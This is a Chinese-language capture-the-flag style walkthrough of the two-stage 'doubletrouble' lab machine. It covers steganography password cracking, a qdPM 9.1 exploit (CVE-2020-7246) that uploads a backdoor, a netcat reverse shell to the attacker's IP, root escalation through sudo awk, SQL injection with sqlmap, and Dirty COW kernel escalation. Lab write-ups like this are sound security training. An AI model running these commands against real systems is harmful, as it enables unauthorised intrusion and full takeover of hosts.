前言
这是打靶训练的第16周,靶机下载,此套靶机非常的特殊,一个靶机中嵌套了一个靶机。难度中。
信息搜集
nmap只扫到了80、22端口,查看网页。得到一个登录框,cms为qdPM 9.1
进行路径探测,得到secret
目录,访问
有一张图片,下载看看
隐写术解密
遇到这种第一时间就应该想到隐写术,使用steghide info doubletrouble.jpg
,查看隐写,提示需要密码
接下来使用stegseek进行密码破解,stegseek doubletrouble.jpg rockyou.txt -xf file
,使用rockyou.txt字典,将获取到的内容保存为file文件。
破解出来密码为92camaro
cat file
后,得到用户名otisrush@localhost.com
,密码otis666
成功登录
CVE-2020-7246
网上搜索了一波qdPM 9.1漏洞,存在CVE-2020-7246,下载完成后,自己改下源码的缩进,它的缩进有问题。
之后使用python 50175.py -url http://192.168.2.122/ -u otisrush@localhost.com -p otis666
,上传了一个后门
访问此链接,可看到后门文件
成功执行whoami
kali监听4444,执行nc -e /bin/bash 192.168.2.116 4444
,反弹一个shell
sudo -l
,awk存在提权,使用sudo awk 'BEGIN {system("/bin/bash")}'
,进行提权
第二台靶机
在/root
下存在第二台靶机,这里使用nc进行文件传输。kali使用nc -lvp 4444 > second.ova
,将文件保存为second.ova
。靶机使用nc -vn 192.168.2.116 4444 < doubletrouble.ova -w 1
,-w 1
是文件传输完毕后,1s后断开连接。
为了防止数据在传输过程中被损坏,建议校验一下md5值,此靶机值为186b2cb6b64e630c6e93fb9905e76a0d
安装好后,继续进行端口扫描,得到80,22。打开网页
sql注入
使用sqlmap进行梭哈,发现存在sql注入
获取表名
获取数据
尝试了一番,发现网页上登录不上。回到ssh,继续尝试,最终以clapton ZubZub99登录
脏牛提权
内核为Debian 3.2.78-1 x86_64
,使用脏牛提权
git clone git://github.com/FireFart/dirtycow.git
gcc -o dirtycow dirtycow.c -pthread -lcrypt
./dirty 123456